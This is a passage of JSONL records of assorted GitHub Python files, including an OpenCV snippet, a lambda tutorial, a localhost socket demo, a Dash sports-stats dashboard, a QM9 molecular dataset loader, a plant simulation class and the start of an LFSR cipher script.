= b*rho\n#         x1 = int(x0 + 1000*(-b))\n#         y1 = int(y0 + 1000*(a))\n#         x2 = int(x0 - 1000*(-b))\n#         y2 = int(y0 - 1000*(a))\n#         cv2.line(img, (x1, y1), (x2, y2), (255, 0, 0), 2)\n# cropped = img[100:200, 500:640]\n#\n#\n# cv2.imshow('img', img)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n","repo_name":"flashwoman/Object-detection","sub_path":"testfiles_ara/DrawLine.py","file_name":"DrawLine.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33687626551","text":"\"\"\"Lambda functions have no name.\n   They must be expressed in one line.\n   The keyword lambda is followed by a number of parameters,\n   then a colon and then the expression.\n   The output of the expression is returned automatically\"\"\"\n\n# A program to return 3x + 1\nf = lambda x: 3*x + 1\n\nprint(f(2))\n\n# Combine first & last name into full name\nfull_name = lambda fn, ln: fn.strip().title() + ' ' + ln.strip().title()\n\nprint(full_name('KIRAN', 'SaWaNt '))\n\n#__________actual use of a lambda___________#\n# Sorting a list by last name\nnames = [\"H. G. Wells\", \"Isaac Asimov\", \"Ray Bradbury\", \"Robert Heinlein\", \"Arthur C. 
Clarke\", \"Frank Herbert\"]\n\nnames.sort(key=lambda name: name.split(' ')[-1].lower())\nprint(names)\n\n# Function that returns a quadratic equation\ndef build_equation(a, b, c): #Firstclass function\n '''Returns the function f(x) = ax^2 + bx + c'''\n return lambda x: a*x**2 + b*x + c #lambda as a closure\n\nk = build_equation(2, 3, -5)\nprint(k(5)) #arguments passed are assigned to lambda(x)\n\nj = build_equation(3, 0, 1)(2)\nprint(j)","repo_name":"Kiran-Sawant/Python_learning_curve","sub_path":"Used Defined Functions/lambda functions.py","file_name":"lambda functions.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18470436436","text":"__author__ = 'Administrator'\n\n\"this is a socket client demonstrates\"\n\nimport socket, glob\n\ns = socket.socket()\n\ns.connect((\"127.0.0.1\", 50007)) # socketServerDemo must execute first\n\n\n\nfor file in glob.glob('*.py'):\n with open(file, 'r') as handle:\n for line in handle:\n s.send(line.encode('utf-8'))\nwhile True:\n data = s.recv(100)\n\n print(list(bytearray(data)))\n print(not data)\ns.close()\n\n","repo_name":"loovien/pythonstudy","sub_path":"socketDemo/socketClientDemo.py","file_name":"socketClientDemo.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33417787362","text":"import os, redis, subprocess\n\nr = redis.Redis(\nhost='redis-master.redis.svc.cluster.local',\nport=6379)\nnode = os.getenv(\"NODE_NAME\")\ntry:\n numa_output = subprocess.check_output(['numalign'], shell=True)\n if 'true' in numa_output.decode('utf-8'):\n if not r.exists('aligned_count'):\n r.set('aligned_count', 0)\n r.incr('aligned_count')\n if not r.exists(node):\n r.set(node, 0)\n r.incr(node)\nexcept Exception as e:\n if not r.exists('unaligned_count'):\n r.set('unaligned_count', 0)\n r.incr('unaligned_count')\n","repo_name":"mukrishn/openshift-testing","sub_path":"scripts/numalign/redis-client.py","file_name":"redis-client.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"71404821538","text":"# Run this app with `python app.py` and\n# visit http://127.0.0.1:8050/ in your web browser.\nimport json\nfrom dash import Dash, html, dcc, Output, Input, dash_table\nimport plotly.express as px\nimport pandas as pd\nimport requests\nfrom dotenv import load_dotenv\nimport os\nimport dash_bootstrap_components as dbc\nfrom plotly.subplots import make_subplots\nfrom supabase import create_client, Client\nimport plotly.graph_objects as go\n\n\nload_dotenv()\n\napp = Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])\n\n# Instantiate the client with an endpoint.\nurl = os.getenv(\"SUPABASE_URL\")\nkey = os.getenv(\"SUPABASE_KEY\")\n\n# data = requests.get(f\"{url}/rest/v1/stats?select=*,teams(team_name)\", headers={'apikey': key}).json()\n# flatten the json\n# data = [dict(**d, **d.pop('teams')) for d in data]\n\n# df = pd.DataFrame(data)\ndf = pd.read_csv('../data/processed_stats.csv')\ndf = df.rename(columns={'team': 'team_name'})\n\nfig_goals = px.bar(df, x=\"team_name\", y=[\"goals\", 'goals_against'], barmode=\"group\",\n labels={'goals': 'Goals', 'goals_against': 'Goals Against'})\n\nfig_penalties = px.bar(df, x=\"team_name\", y=['powerplay', 'boxplay'], barmode=\"group\",\n labels={'powerplay': 'Powerplay', 'boxplay': 'Boxplay'})\nfig_efficeny = 
px.scatter(df, x=\"boxplay_efficiency\", y='powerplay_efficiency', text='team_name',\n hover_name='team_name', hover_data=['rank', 'points', 'points_per_game'],\n labels={'powerplay_efficiency': 'Powerplay Effizienz',\n 'boxplay_efficiency': 'Boxplay Effizienz'})\nfig_efficeny.update_traces(textposition='top center')\n\nteams = df['team_name'].to_list()\npoints_against = df['points_against'].to_list()\n\nheatmap = pd.DataFrame(columns=['team_name'] + teams)\n\nheatmap_data = []\nfor points, team in zip(points_against, teams):\n points = json.loads(points.replace(\"'\", '\"'))\n d = {'team_name': team}\n d.update(points)\n heatmap_data.append(d)\nheatmap = pd.DataFrame(heatmap_data, columns=['team_name'] + teams, index=teams)\n\nfig_points_against = px.imshow(heatmap[teams], y=teams, text_auto=True)\nfig_points_against = fig_points_against.update_layout(showlegend=False)\n\nfig_goals_per_game = px.scatter(df, x=\"goals_per_game\", text='team_name', hover_name='team_name',\n hover_data=['points', 'points_per_game', 'scoring_ratio'], y='goals_against_per_game',\n labels={'goals_per_game': 'Goals per Game',\n 'goals_against_per_game': 'Goals Against per Game'})\nfig_goals_per_game.update_traces(textposition='top center')\n\nspecial_goals_fig = px.bar(df, x=\"team_name\",\n y=['leading_goals', 'equalizer_goals', 'first_goal_of_match', 'penalty_shot_goals'],\n labels={'leading_goals': 'Leading Goals', 'equalizer_goals': 'Equalizer Goals',\n 'first_goal_of_match': 'First Goal of Match',\n 'penalty_shot_goals': 'Penalty Shot Goals',\n })\n\nspecial_goals_against_fig = px.bar(df, x=\"team_name\",\n y=['leading_goals_against', 'equalizer_goals_against', 'first_goal_of_match_against', 'penalty_shot_goals_against'],\n labels={'leading_goals_against': 'Leading Goals', 'equalizer_goals_against': 'Equalizer Goals',\n 'first_goal_of_match_against': 'First Goal of Match',\n 'penalty_shot_goals_against': 'Penalty Shot Goals',\n })\nspecial_goals_fig.update_xaxes(tickangle=25)\nspecial_goals_fig.update_yaxes(range=[0,60])\nspecial_goals_against_fig.update_xaxes(tickangle=25)\n# set the same max values\nspecial_goals_against_fig.update_yaxes(range=[0, 60])\n\ncolumns = [c for c, t in zip(df.columns, df.iloc[0]) if type(t) not in [dict, list]]\n\napp.layout = dbc.Container(html.Div(children=[\n html.H1(children='Floorball Bundesliga Dashboard'),\n\n dbc.Row(children=[dcc.Dropdown(\n id='period-filter',\n options=[\n {'label': period, 'value': period} for period in\n ['full_game', 'first_period', 'second_period', 'third_period', 'overtime']\n ],\n value='full_game' # Default selection\n )]),\n dbc.Row(children=[\n dbc.Col(dcc.Graph(id='goals-graph', figure=fig_goals, )), # config={'edits': {'legendPosition': False, }})),\n dbc.Col(dcc.Graph(id='penalty-graph', figure=fig_penalties, )),#config={'edits': {'legendPosition': False, }}))\n ]),\n dbc.Row(children=[\n dbc.Col(\n dcc.Graph(id='efficiency-graph', figure=fig_efficeny),\n ),\n dbc.Col(dcc.Graph(id='fig_goals_per_game', figure=fig_goals_per_game)),\n\n ]),\n dbc.Row(\n children=[\n dbc.Col(children=[dcc.Graph(id='fig_points_against', figure=fig_points_against)])\n ]\n ),\n dbc.Row(\n children=[\n dbc.Col(children=[dcc.Graph(id='special_goals_fig', figure=special_goals_fig),]),\n dbc.Col(children=[dcc.Graph(id='special_goals_against_fig', figure=special_goals_against_fig),])\n ]\n ),\n dcc.Checklist(id='table-columns',\n options=[{'label': col, 'value': col} for col in [\n 'points_per_game',\n 'home_points',\n 'away_points',\n ]],\n inline=True\n ),\n 
dash_table.DataTable(\n id='table',\n columns=[{\"name\": i, \"id\": i} for i in columns],\n data=df[columns].to_dict('records'),\n sort_action='native',\n style_cell={'text-align': 'left'}\n )\n]), fluid=False)\n\n\n@app.callback(\n Output('goals-graph', 'figure'),\n [Input('period-filter', 'value')]\n)\ndef update_goals_graph(selected_period):\n goals, goals_against = 'goals', 'goals_against'\n if selected_period == 'first_period':\n goals += '_in_first_period'\n goals_against = 'goals_in_first_period_against'\n elif selected_period == 'second_period':\n goals += '_in_second_period'\n goals_against = 'goals_in_second_period_against'\n elif selected_period == 'third_period':\n goals += '_in_third_period'\n goals_against = 'goals_in_third_period_against'\n elif selected_period == 'overtime':\n goals += '_in_overtime'\n goals_against = 'goals_in_overtime_against'\n\n fig = px.bar(df, x=\"team_name\", y=[goals, goals_against], barmode=\"group\", labels={'goals': 'Goals', 'goals_against': 'Goals Against'})\n fig.update_xaxes(title_text='Teams')\n fig.update_yaxes(title_text='Goals')\n #fig.update_layout(showlegend=False)\n return fig\n\n\n@app.callback(\n Output('table', 'columns'),\n [Input('table-columns', 'value')])\ndef update_table(selected_columns):\n default_columns = ['rank', 'team_name', 'points', 'goals', 'goals_against']\n if selected_columns is not None:\n columns = default_columns + selected_columns\n else:\n columns = default_columns\n return [{\"name\": col, \"id\": col} for col in columns]\n\n\n@app.callback(\n Output('penalty-graph', 'figure'),\n [Input('period-filter', 'value')]\n)\ndef update_penalties_graph(selected_period):\n powerplay, boxplay = 'powerplay', 'boxplay'\n if selected_period == 'first_period':\n powerplay += '_first_period'\n boxplay += '_first_period'\n elif selected_period == 'second_period':\n powerplay += '_second_period'\n boxplay += '_second_period'\n elif selected_period == 'third_period':\n powerplay += '_third_period'\n boxplay += '_third_period'\n elif selected_period == 'overtime':\n powerplay += '_overtime'\n boxplay += '_overtime'\n fig = px.bar(df, x=\"team_name\", y=[powerplay, boxplay], barmode=\"group\")\n return fig\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"chefkoch24/floorball-stats","sub_path":"dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39833620318","text":"#!/usr/bin/env python\n\nimport re\n\nf = open(\"uk.txt\")\nfor line in f:\n line = line.rstrip()\n pattern = re.compile('(==*)\\s*(.*?)\\s*\\\\1')\n match = pattern.match(line)\n if match:\n print( [ len(match.group(1))-1, \n match.group(2) ] )","repo_name":"masao/nlp100","sub_path":"23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"5147842902","text":"import logging\nimport os\nimport re\nimport shutil\nimport tarfile\nimport tempfile\nfrom urllib import request as request\nfrom urllib.error import HTTPError, URLError\n\nimport numpy as np\nfrom ase.db import connect\nfrom ase.io.extxyz import read_xyz\nfrom ase.units import Debye, Bohr, Hartree, eV\n\nfrom schnetpack.data import AtomsData\nfrom schnetpack.environment import SimpleEnvironmentProvider\n\n\nclass QM9(AtomsData):\n \"\"\" QM9 benchmark dataset for organic molecules with up to nine heavy atoms from {C, O, N, F}.\n\n This 
class adds convenience functions to download QM9 from figshare and load the data into pytorch.\n\n    Args:\n        path (str): path to directory containing qm9 database.\n        download (bool): enable downloading if the database does not exist (default: True)\n        subset (list): indices of subset. Set to None for entire dataset (default: None)\n        properties (list): properties in qm9, e.g. U0\n        pair_provider (BaseEnvironmentProvider):\n        remove_uncharacterized (bool): remove uncharacterized molecules from dataset (according to [#qm9_1]_)\n\n    References:\n        .. [#qm9_1] https://ndownloader.figshare.com/files/3195404\n\n    \"\"\"\n\n    # properties\n    A = 'rotational_constant_A'\n    B = 'rotational_constant_B'\n    C = 'rotational_constant_C'\n    mu = 'dipole_moment'\n    alpha = 'isotropic_polarizability'\n    homo = 'homo'\n    lumo = 'lumo'\n    gap = 'gap'\n    r2 = 'electronic_spatial_extent'\n    zpve = 'zpve'\n    U0 = 'energy_U0'\n    U = 'energy_U'\n    H = 'enthalpy_H'\n    G = 'free_energy'\n    Cv = 'heat_capacity'\n\n    properties = [\n        A, B, C, mu, alpha,\n        homo, lumo, gap, r2, zpve,\n        U0, U, H, G, Cv\n    ]\n\n    reference = {\n        zpve: 0, U0: 1, U: 2, H: 3, G: 4, Cv: 5\n    }\n\n    units = dict(\n        zip(properties,\n            [\n                1., 1., 1., Debye, Bohr ** 3,\n                Hartree, Hartree, Hartree,\n                Bohr ** 2, Hartree,\n                Hartree, Hartree, Hartree,\n                Hartree, 1.\n            ]\n            )\n    )\n\n    def __init__(self, path, download=True, subset=None, properties=[], collect_triples=False,\n                 remove_uncharacterized=False):\n        self.path = path\n        self.dbpath = os.path.join(self.path, 'qm9.db')\n        self.atomref_path = os.path.join(self.path, 'atomref.npz')\n        self.evilmols_path = os.path.join(self.path, 'evilmols.npy')\n\n        environment_provider = SimpleEnvironmentProvider()\n\n        if download:\n            self._download()\n\n        if remove_uncharacterized:\n            if subset is None:\n                with connect(self.dbpath) as con:\n                    subset = np.arange(con.count())\n            else:\n                subset = np.array(subset)\n            evilmols = np.load(self.evilmols_path)\n\n            # attention: 1-indexing vs 0-indexing\n            subset = np.setdiff1d(subset, evilmols - 1)\n\n        super().__init__(self.dbpath, subset, properties, environment_provider, collect_triples)\n\n    def create_subset(self, idx):\n        idx = np.array(idx)\n        subidx = idx if self.subset is None else np.array(self.subset)[idx]\n\n        return QM9(self.path, False, subidx, self.properties, self.collect_triples, False)\n\n    def _download(self):\n        works = True\n        if not os.path.exists(self.path):\n            os.makedirs(self.path)\n\n        if not os.path.exists(self.atomref_path):\n            works = works and self._load_atomrefs()\n        if not os.path.exists(self.dbpath):\n            works = works and self._load_data()\n        if not os.path.exists(self.evilmols_path):\n            works = works and self._load_evilmols()\n        return works\n\n    def get_reference(self, property):\n        \"\"\"\n        Returns atomref for property.\n\n        Args:\n            property: property in the qm9 dataset\n\n        Returns:\n            list: list with atomrefs\n        \"\"\"\n        if property not in QM9.reference:\n            atomref = None\n        else:\n            col = QM9.reference[property]\n            atomref = np.load(self.atomref_path)['atom_ref'][:, col:col + 1]\n        return atomref\n\n    def _load_atomrefs(self):\n        logging.info('Downloading GDB-9 atom references...')\n        at_url = 'https://ndownloader.figshare.com/files/3195395'\n        tmpdir = tempfile.mkdtemp('gdb9')\n        tmp_path = os.path.join(tmpdir, 'atomrefs.txt')\n\n        try:\n            request.urlretrieve(at_url, tmp_path)\n            logging.info(\"Done.\")\n        except HTTPError as e:\n            logging.error(\"HTTP Error: %s %s\", e.code, at_url)\n            return False\n        except URLError as e:\n            logging.error(\"URL Error: %s %s\", e.reason, at_url)\n            return False\n\n        atref = np.zeros((100, 6))\n        
labels = ['zpve', 'U0', 'U', 'H', 'G', 'Cv']\n        with open(tmp_path) as f:\n            lines = f.readlines()\n            for z, l in zip([1, 6, 7, 8, 9], lines[5:10]):\n                atref[z, 0] = float(l.split()[1])\n                atref[z, 1] = float(l.split()[2]) * Hartree / eV\n                atref[z, 2] = float(l.split()[3]) * Hartree / eV\n                atref[z, 3] = float(l.split()[4]) * Hartree / eV\n                atref[z, 4] = float(l.split()[5]) * Hartree / eV\n                atref[z, 5] = float(l.split()[6])\n        np.savez(self.atomref_path, atom_ref=atref, labels=labels)\n        return True\n\n    def _load_evilmols(self):\n        logging.info('Downloading list of evil molecules...')\n        at_url = 'https://ndownloader.figshare.com/files/3195404'\n        tmpdir = tempfile.mkdtemp('gdb9')\n        tmp_path = os.path.join(tmpdir, 'uncharacterized.txt')\n\n        try:\n            request.urlretrieve(at_url, tmp_path)\n            logging.info(\"Done.\")\n        except HTTPError as e:\n            logging.error(\"HTTP Error: %s %s\", e.code, at_url)\n            return False\n        except URLError as e:\n            logging.error(\"URL Error: %s %s\", e.reason, at_url)\n            return False\n\n        evilmols = []\n        with open(tmp_path) as f:\n            lines = f.readlines()\n            for line in lines[9:-1]:\n                evilmols.append(int(line.split()[0]))\n        np.save(self.evilmols_path, np.array(evilmols))\n        return True\n\n    def _load_data(self):\n        logging.info('Downloading GDB-9 data...')\n        tmpdir = tempfile.mkdtemp('gdb9')\n        tar_path = os.path.join(tmpdir, 'gdb9.tar.gz')\n        raw_path = os.path.join(tmpdir, 'gdb9_xyz')\n        url = 'https://ndownloader.figshare.com/files/3195389'\n\n        try:\n            request.urlretrieve(url, tar_path)\n            logging.info(\"Done.\")\n        except HTTPError as e:\n            logging.error(\"HTTP Error: %s %s\", e.code, url)\n            return False\n        except URLError as e:\n            logging.error(\"URL Error: %s %s\", e.reason, url)\n            return False\n\n        tar = tarfile.open(tar_path)\n        tar.extractall(raw_path)\n        tar.close()\n\n        logging.info('Parsing xyz files...')\n        with connect(self.dbpath) as con:\n            ordered_files = sorted(os.listdir(raw_path), key=lambda x: (int(re.sub(r'\D', '', x)), x))\n            for i, xyzfile in enumerate(ordered_files):\n                xyzfile = os.path.join(raw_path, xyzfile)\n\n                if (i + 1) % 10000 == 0:\n                    logging.info('Parsed: {:6d} / 133885'.format(i + 1))\n                properties = {}\n                tmp = os.path.join(tmpdir, 'tmp.xyz')\n\n                with open(xyzfile, 'r') as f:\n                    lines = f.readlines()\n                    l = lines[1].split()[2:]\n                    for pn, p in zip(self.properties, l):\n                        properties[pn] = float(p) * self.units[pn]\n                    with open(tmp, \"wt\") as fout:\n                        for line in lines:\n                            fout.write(line.replace('*^', 'e'))\n\n                with open(tmp, 'r') as f:\n                    ats = list(read_xyz(f, 0))[0]\n\n                con.write(ats, data=properties)\n        logging.info('Done.')\n\n        shutil.rmtree(tmpdir)\n\n        return True\n","repo_name":"lauri-codes/schnetpack","sub_path":"src/schnetpack/datasets/qm9.py","file_name":"qm9.py","file_ext":"py","file_size_in_byte":8088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"72730465377","text":"#!/usr/bin/env python3\n\n##\n## EPITECH PROJECT, 2023\n## 107transfer\n## File description:\n## python file\n##\n\nfrom argparse import ArgumentParser, Namespace\nfrom sys import argv, exit\nfrom typing import List\n\n\ndef man_help() -> int:\n    print(\n        \"\"\"USAGE\n    ./107transfer [num dem]*\nDESCRIPTION\n    num    polynomial numerator defined by its coefficients\n    dem    polynomial denominator defined by its coefficients\n\n    Pass -h twice for more info. 
\"\"\"\n )\n return 0\n\n\ndef man_help2() -> int:\n print(\n \"\"\"USAGE\n ./107transfer [num dem]*\nDESCRIPTION\n num polynomial numerator defined by its coefficients, separated by '*'\n Example: \"1*2*3\" for \"3x^2 + 2x + 1\"\n dem polynomial denominator defined by its coefficients, separated by '*'\n Example: \"1*2*3\" for \"3x^2 + 2x + 1\"\n Coefficients should not be zero.\n Coefficients must be integers between -100 and 100 inclusive.\"\"\"\n )\n return 0\n\n\ndef get_polynom(formule: str) -> List[int]:\n try:\n return [int(coeff) for coeff in formule.split('*')]\n except ValueError:\n print(\"Invalid Number\")\n exit(84)\n\n\ndef evaluate_polynomial(coefficients: List[int], x: float) -> float:\n result = 0.0\n for coeff in reversed(coefficients):\n result = result * x + coeff\n return result\n\n\ndef trans_print(args: List[List[int]]) -> None:\n x: float = 0\n while x <= 1.001:\n result: float = 1\n for num, dem in zip(args[::2], args[1::2]):\n numerator = evaluate_polynomial(num, x)\n denominator = evaluate_polynomial(dem, x)\n if denominator == 0:\n exit(84)\n result *= numerator / denominator\n print(f\"{x:.3f} -> {result:.5f}\")\n x += 0.001\n\n\ndef get_args() -> List[List[int]]:\n parser: ArgumentParser = ArgumentParser()\n parse_list: List[List[int]] = []\n\n parser.add_argument(\"formules\", type=str, nargs=\"+\")\n\n try:\n args: Namespace = parser.parse_args()\n parse_list = [get_polynom(formule) for formule in args.formules]\n except SystemExit:\n exit(84)\n\n return parse_list\n\n\ndef main() -> int:\n if \"-h\" in argv:\n if argv.count(\"-h\") == 2:\n return man_help2()\n return man_help()\n if (len(argv) - 1) % 2 != 0:\n print(\"Invalid Numbers\")\n return 84\n args: List[List[int]] = get_args()\n trans_print(args)\n return 0\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"Garoverr/107transfer","sub_path":"107transfer.py","file_name":"107transfer.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"1307773752","text":"from typing import List, Optional, Protocol, Tuple, Union\n\nimport numpy\nfrom casadi import DM, Function, mtimes, vertcat\n\nfrom yaocptool.modelling import DataSet, SystemModel\n\n\nclass PlantInterface(Protocol):\n name: str\n t_0: float\n t_s: float\n\n def get_measurement(self) -> Tuple[float, DM, DM]:\n \"\"\"\n :returns: (timestamp, measuremnt, control)\n \"\"\"\n ...\n\n def set_control(self, u):\n pass\n\n\nclass PlantSimulation(PlantInterface):\n \"\"\"\n Simulates a plant using a model.\n\n \"\"\"\n\n def __init__(\n self,\n model: SystemModel,\n x_0: DM,\n u_0: DM,\n y_guess: float,\n t_0: float = 0.0,\n t_s: float = 0.0,\n c_matrix: Optional[DM] = None,\n d_matrix: Optional[DM] = None,\n verbosity: int = 1,\n super_samling: Union[int, List[float]] = 1,\n u_function: Optional[Function] = None,\n ):\n \"\"\"\n Plant which uses a SystemModel.simulate to obtain the measurements.\n\n :param SystemModel model: simulation model\n :param DM x_0: initial condition\n :param DM t_s: (default: 1) sampling time\n :param DM u: (default: 0) initial control\n :param DM y_guess: initial guess for algebraic variables for simulation\n :param DM t_0: (default: 0) initial time\n :param dict integrator_options: integrator options\n :param bool has_noise: Turn on/off the process/measurement noise\n :param DM r_n: Measurement noise covariance matrix\n :param DM r_v: Process noise covariance matrix\n :param noise_seed: Seed for the random number 
generator used to create noise. Use the same seed for the\n repeatability in the experiments.\n \"\"\"\n self.model = model\n self.name = self.model.name\n self.t_s = float(t_s)\n\n self.x = x_0\n self.measurement = x_0\n self.u = u_0 if u_0 is not None else DM.zeros(self.model.n_u)\n self.t = self.t_0 = float(t_0)\n\n self.y_guess = y_guess\n self.u_function = u_function\n\n self.c_matrix = (\n c_matrix\n if c_matrix is not None\n else DM.eye(self.model.n_x + self.model.n_y)\n )\n self.d_matrix = d_matrix if d_matrix is not None else DM(0.0)\n self.d_matrix = None\n\n self.p = None\n self.theta = None\n\n # Noise\n self.has_noise = False\n self.r_n = DM(0.0)\n self.r_v = DM(0.0)\n self.noise_seed = None\n\n # Options\n self.verbosity = verbosity\n self.sampling_points = (\n [1.0 / super_samling * (point + 1) for point in range(super_samling)]\n if isinstance(super_samling, int)\n else super_samling\n )\n self.integrator_options = None\n self.dataset = DataSet(name=\"Plant\")\n\n self._iterations = 0\n\n self._initialize_dataset()\n\n meas_data = self._measure(self.x, self.y_guess)\n\n self._save_data(self.x, self.y_guess, self.u, **meas_data)\n if self.has_noise and self.noise_seed is not None:\n numpy.random.seed(self.noise_seed)\n\n def get_measurement(self) -> Tuple[float, DM, DM]:\n \"\"\"Return the plant measurement of a simulated model and advance time by 't_s'.\n Return the measurement time, the measurement [x; y], and the controls.\n\n :rtype: tuple\n :return: (timestamp, measuremnt, control)\n \"\"\"\n return self.t, self.measurement, self.u\n\n def set_control_function(self, u_func):\n \"\"\"\n Set a new control for the plant and simulate\n\n :param DM u: new control vector\n \"\"\"\n self.u_function = u_func\n\n # go to next time\n self._advance()\n\n def set_control(self, u: Union[DM, float, List[float]]):\n \"\"\"\n Set a new control for the plant and simulate\n\n :param DM u: new control vector\n \"\"\"\n if isinstance(u, (list, int, float)):\n u = vertcat(u)\n\n if self.verbosity >= 1:\n print(\"Set control: {}\".format(u))\n\n if u.shape[0] != self.model.n_u_par:\n raise ValueError(\n \"Given control does not have the same size of the plant.\"\n \"Plant control size: {}, given control size: {}\".format(\n self.model.n_u_par, u.shape[0]\n )\n )\n self.u = u\n\n # go to next time\n self._advance()\n\n def _advance(self):\n t_start = self.t\n for delta_t in self.sampling_points:\n t_f = t_start + delta_t * self.t_s\n\n if self.u_function is not None:\n self.u = self.u_function(self.t) # type: ignore\n\n sim_result = self.model.simulate(\n x_0=self.x,\n t_0=self.t,\n t_f=t_f,\n y_0=self.y_guess,\n u=self.u,\n p=self.p,\n theta=self.theta,\n integrator_options=self.integrator_options,\n )\n\n x_sim, y, u = sim_result.final_condition().values()\n\n # Process noise\n x = x_sim + self._process_noise() if self.has_noise else x_sim\n\n self.t = t_f\n self.x = x\n self._save_data(x, y, u)\n\n # Measure\n meas_data = self._measure(x, y)\n self.dataset.insert_data(\"meas\", self.t, meas_data[\"measurement\"])\n self.dataset.insert_data(\n \"meas_wo_noise\", self.t, meas_data[\"measurement_wo_noise\"]\n )\n self.measurement = meas_data[\"measurement\"]\n\n def _process_noise(self):\n return DM(numpy.random.multivariate_normal([0] * self.r_v.shape[0], self.r_v))\n\n def _measure(self, x, y):\n measurement_wo_noise = mtimes(self.c_matrix, vertcat(x, y))\n if self.has_noise:\n n_rand = DM(\n numpy.random.multivariate_normal([0] * self.r_n.shape[0], self.r_n)\n )\n measurement = 
measurement_wo_noise + n_rand\n else:\n measurement = measurement_wo_noise\n\n return {\n \"measurement\": measurement,\n \"measurement_wo_noise\": measurement_wo_noise,\n }\n\n def _save_data(self, x, y, u, measurement=None, measurement_wo_noise=None):\n self.dataset.insert_data(\"x\", self.t, x)\n self.dataset.insert_data(\"y\", self.t, y)\n self.dataset.insert_data(\"u\", self.t, u)\n\n if measurement is not None:\n self.dataset.insert_data(\"meas\", self.t, measurement)\n\n if measurement is not None:\n self.dataset.insert_data(\"meas_wo_noise\", self.t, measurement_wo_noise)\n\n def _initialize_dataset(self):\n self.dataset.create_entry(\n \"x\",\n self.model.n_x,\n [self.model.x[i].name() for i in range(self.model.n_x)],\n )\n\n self.dataset.create_entry(\n \"y\",\n self.model.n_y,\n [self.model.y[i].name() for i in range(self.model.n_y)],\n )\n\n self.dataset.create_entry(\n \"u\",\n self.model.n_u,\n [self.model.u[i].name() for i in range(self.model.n_u)],\n plot_style=\"step\",\n )\n\n self.dataset.create_entry(\n \"meas_wo_noise\",\n self.model.n_x,\n [\"meas_wo_noise_\" + str(i) for i in range(self.model.n_x)],\n )\n self.dataset.create_entry(\n \"meas\",\n self.model.n_x,\n [\"meas_\" + str(i) for i in range(self.model.n_x)],\n )\n","repo_name":"marcoaaguiar/yaocptool","sub_path":"yaocptool/mpc/plant.py","file_name":"plant.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"43559305247","text":"from Crypto.Cipher import AES, PKCS1_OAEP, PKCS1_v1_5\r\nfrom Crypto.PublicKey import RSA\r\nfrom Crypto.Util.number import inverse, long_to_bytes, bytes_to_long, isPrime, getPrime, GCD\r\nfrom tqdm import tqdm\r\nfrom pwn import *\r\nfrom sage.all import *\r\nimport gmpy2, pickle, itertools, sys, json, hashlib, os, math, time, base64, binascii, string, re, struct, datetime, subprocess\r\nimport numpy as np\r\nimport random as rand\r\nimport multiprocessing as mp\r\nfrom base64 import b64encode, b64decode\r\nfrom sage.modules.free_module_integer import IntegerLattice\r\nfrom ecdsa import ecdsa\r\n\r\n\r\ndef bsum(state, taps, l):\r\n\tret = 0\r\n\tfor i in taps:\r\n\t\tret ^= (state >> (l - i))\r\n\treturn ret & 1\r\n\r\nclass Gen:\r\n\tdef __init__(self, key, slength):\r\n\t\tself.state = key\r\n\t\tself.slength = slength\r\n\t\tself.TAPS = [2, 4, 5, 7, 10, 12, 13, 17, 19, 24, 25, 27, 30, 32, \r\n\t\t33, 34, 35, 45, 47, 49, 50, 52, 54, 56, 57, 58, 59, 60, 61, 64]\r\n\r\n\tdef clock(self):\r\n\t\tout = bsum(self.state, self.TAPS, self.slength)\r\n\t\tself.state = (out << (self.slength - 1)) + (self.state >> 1)\r\n\t\treturn out\r\n\r\ndef gf256_multiply(a, b):\r\n\tp = 0\r\n\tfor _ in range(8):\r\n\t\tif b % 2:\r\n\t\t\tp ^= a\r\n\t\tcheck = a & 0x80\r\n\t\ta <<= 1\r\n\t\tif check == 0x80:\r\n\t\t\ta ^= 0x1b\r\n\t\tb >>= 1\r\n\treturn p % 256\r\n\r\ndef gf256_inverse(x):\r\n\tret = 1\r\n\td = 254\r\n\twhile d > 0:\r\n\t\tif d % 2 == 1:\r\n\t\t\tret = gf256_multiply(ret, x)\r\n\t\td //= 2\r\n\t\tx = gf256_multiply(x, x)\r\n\treturn ret\r\n\r\nlookup = [0] * 256\r\nfor i in range(1, 256):\r\n\tlookup[i] = gf256_inverse(i)\r\n\tassert gf256_multiply(lookup[i], i) == 1\r\n\r\nval = []\r\nfor i in range(256):\r\n\tval.append([0] * 256)\r\nfor i in range(256):\r\n\tfor j in range(256):\r\n\t\tval[i][j] = gf256_multiply(i, j)\r\n\r\ndef encrypt(fn, outf, key):\r\n\tcipher = Gen(key, 64)\r\n\tpt = b''\r\n\twith open(fn, 'rb') as f:\r\n\t\tpt = f.read()\r\n\tct = b''\r\n\tfor byte in 
